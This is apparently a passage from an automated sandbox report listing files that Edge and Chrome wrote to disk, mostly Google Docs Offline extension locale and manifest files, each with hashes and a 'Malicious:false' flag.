                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11280
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                                                  MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                                                  SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                                                  SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                                                  SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                                                  MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                                                  SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                                                  SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                                                  SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):98880
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                                                  MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                                                  SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                                                  SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                                                  SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):107677
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                                                  MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                                                  SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                                                  SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                                                  SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.984630421038291
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8M0d2TyO2cH6idAKZdA1oehwiZUklqehgy+3:8M9/2w3y
                                                                                                                                                                                                                                                                                                                  MD5:9029C2C5F3FB9ADB81CF9AADA3CCE4BE
